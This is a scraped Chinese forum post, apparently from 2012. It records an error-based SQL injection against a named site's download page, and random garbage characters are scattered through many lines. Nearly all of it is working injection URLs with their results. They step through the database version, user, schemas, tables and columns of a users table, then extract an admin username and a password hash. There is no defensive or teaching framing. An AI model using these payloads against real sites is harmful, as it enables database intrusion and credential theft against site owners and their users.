http://www.wooyun.org/bugs/wooyun-2010-01666
3 B- S7 u( u Q! G, s
# i5 t9 _- R5 F' g之前想找个测试 没想到这有 可以测试下做个记录而已
, \3 h4 t3 ?6 P9 z$ e# Z L
: ]: z: _; h1 N! xhttp://xxoo/download/downpage/netarea/id/1600003'+and+(select+1+from(select+count(*),concat(0x7c,(select+(Select+version())+from+information_schema.tables+limit+0,1),0x7c,floor(rand(0)*2))x+from+information_schema.tables+group+by+x+limit+0,1)a)%23/wapc/5000_0005_003( b9 k- G `( D' K7 C: e1 _
* M/ W' x1 J3 b1 T9 X& e
/data0/htdocs/leqi_new/app/myapp.php
" X) v) m% |% x$ k8 R* Q
, L1 [2 ]" M" c/ G% o9 ?- _ F 或者! Y4 J# X4 u+ ]3 P2 V/ N
0 M1 l6 W' C+ U4 P. a. `/**********version()**********/ 5.1.49-log
( v9 f: n# W0 p3 j4 B0 T0 |8 {0 uhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+version()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
3 X1 n! [5 d; }; C& e3 q& E9 p' o3 M5 W! B- u: H$ d X6 o
/**********user()**********/
- N, V/ X; S9 h9 R/ r( `http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
. |! X5 u9 a$ B5 F, `' U0 U
" X0 `9 `2 q, D/**********database()**********/ leqi
7 x% m% G' y" S1 bhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+database()),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
( A6 z5 y7 Y4 ~" {# L% b( q; W" r& a+ o/ R; [- Y
/**********limit依次递归爆库**********/$ @' [# d3 m9 J. ~
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0038 F0 ~. w: y" E8 }# A! W
information_schema! @8 y, Z2 B7 h: a" j, ]
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003# R2 J4 A1 ?& D
leqi
3 U! x! k7 o- J7 Z* lhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+schema_name+from+information_schema.schemata+limit+2,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_0033 p, E* l, B. a+ R
test
" d9 ~5 i/ q0 }( M5 y/ A8 X% }, r. d3 r h" e& w8 K8 H8 ]
/**********limit依次递归爆表名**********/
# r5 T& q% T$ w# g7 rhttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+table_name+from+information_schema.tables+where+table_schema=0x6C657169+limit+200,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
, S! n1 l/ [7 I: Y; h) e6 gusers( ]% `# k8 e: q( U
" o: ?; V3 K% v7 g7 y/ d6 g7 X/**********limit依次递归爆字段名**********/* j4 a/ z6 t1 c
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+column_name+from+information_schema.columns+where+table_schema=0x6C657169+and+table_name=0x7573657273+limit+3,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23/wapc/5000_0005_003
& @4 }; A* M7 _4 L7 a9 z+ Puser_id,username,nickname,passwd,group_id* b8 e, v- c- e; n, ~9 }
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+group_id+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%239 Y% V4 f( C2 \ g5 y
/wapc/5000_0005_003" d" N6 M' j: c
11 21
! Q6 l6 @# k. Q/ S7 w( Thttp:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+user_id+from+users+limit+1,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
* r& r: B8 }$ h6 u3 `/ @4 S/wapc/5000_0005_0030 a1 N6 V& v0 h
11 341 351 3613 S$ i; h6 P, w8 B/ b: }
/**********爆数据**********/
) j2 Z; D! O2 x9 @4 ?http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+username+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%23
0 D3 `2 d/ i, Q$ K1 t7 Radmin9 D0 s! Q" S p4 n4 S9 d
http:///download/downpage/netarea/id/1600003'+or+1=(select+1+from+(select+count(*),concat((SELECT+passwd+from+users+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)%236 I9 B9 S, J( ~3 G6 s) L
6a8b4574ca231eb8bd52764d4978ffcd
1 d0 J2 P) ]) ~1 x
$ j9 }" G ~7 L
3 j, ^6 K7 ^6 I0 Z6 ~9 J$ ~) v$ l# V9 B5 l |
发表于 2012-9-13 17:52:09
收藏
支持
反对